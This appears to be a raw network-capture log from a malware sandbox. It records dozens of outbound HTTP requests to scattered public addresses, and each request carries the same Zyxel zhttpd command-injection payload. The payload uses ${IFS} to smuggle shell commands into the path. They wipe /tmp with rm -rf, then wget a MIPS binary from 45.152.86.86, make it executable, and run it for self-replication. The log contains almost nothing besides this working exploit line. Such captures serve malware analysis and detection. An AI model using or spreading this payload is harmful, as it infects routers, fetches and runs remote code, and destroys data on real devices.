                                        Mar 31, 2024 09:23:00.002778053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9811192.168.2.2351800222.51.179.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002842903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9812192.168.2.2339480197.108.79.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002881050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9813192.168.2.2356302131.31.240.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002943039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9814192.168.2.2354312130.70.20.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002989054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9815192.168.2.2360360107.142.243.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003041983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9816192.168.2.235807673.77.176.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003098011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9817192.168.2.233730838.91.238.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003139973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9818192.168.2.233430625.118.253.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003211975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9819192.168.2.234762865.237.68.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003257990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9820192.168.2.235417480.8.91.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003310919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9821192.168.2.234033224.251.12.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003357887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9822192.168.2.2340322147.246.205.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003405094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9823192.168.2.235997868.10.21.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003463030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9824192.168.2.23580068.240.216.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003494978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9825192.168.2.2347114166.81.71.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003539085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9826192.168.2.234092274.38.20.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003576040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9827192.168.2.2355940172.77.201.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003634930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9828192.168.2.2346452111.247.152.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003695965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9829192.168.2.2354176182.217.26.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003746033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9830192.168.2.2342440179.1.38.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003802061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9831192.168.2.233478232.15.179.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003855944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9832192.168.2.2340954166.173.35.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003906965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9833192.168.2.2333650101.173.106.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003942013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9834192.168.2.233467018.25.31.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.003988028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9835192.168.2.2345022128.182.229.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004034996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9836192.168.2.2338356134.250.89.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004092932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9837192.168.2.2352410113.70.202.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004138947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9838192.168.2.2347440143.14.91.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004198074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9839192.168.2.2343380141.195.85.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004247904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9840192.168.2.2341648211.170.230.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004295111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9841192.168.2.2359666114.145.140.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004343987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9842192.168.2.2348220104.128.60.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004411936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9843192.168.2.2341902104.52.205.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004467964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9844192.168.2.2354772147.207.212.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004519939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9845192.168.2.235994875.83.51.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004570007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9846192.168.2.2349712137.108.31.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004614115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9847192.168.2.2334702223.12.68.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004686117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9848192.168.2.2340780119.217.20.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004718065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9849192.168.2.234111436.45.164.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004753113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9850192.168.2.2343714174.242.126.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004812002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9851192.168.2.2348716121.245.142.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004861116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9852192.168.2.2353382131.253.83.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004909992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9853192.168.2.235856217.135.179.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.004952908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9854192.168.2.2358664156.200.53.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005008936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9855192.168.2.234395624.48.112.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005039930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9856192.168.2.2352916110.165.225.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005089998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9857192.168.2.2345192184.84.118.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005141973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9858192.168.2.233433482.201.216.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005203009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9859192.168.2.234366475.65.159.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005249023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9860192.168.2.2347014151.35.216.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005314112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9861192.168.2.2335566113.45.61.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005356073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9862192.168.2.2332844104.106.189.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005403042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9863192.168.2.234821242.218.238.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005460978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9864192.168.2.233437861.244.51.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005526066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9865192.168.2.234375860.219.37.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005568027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9866192.168.2.2334386212.247.98.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005618095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9867192.168.2.2354632140.123.159.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005675077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9868192.168.2.2340810116.127.215.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005743980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9869192.168.2.233600292.185.224.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005778074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9870192.168.2.235429417.247.85.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005822897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9871192.168.2.2350488121.211.20.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005870104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9872192.168.2.2352838210.146.81.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005903006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9873192.168.2.234421679.170.2.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.005949974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9874192.168.2.235164250.152.52.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006014109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9875192.168.2.235281846.126.58.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006061077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9876192.168.2.235822246.19.162.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006112099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9877192.168.2.2343086140.58.170.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.006176949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9878192.168.2.234554623.216.17.227443
                                        TimestampBytes transferredDirectionData
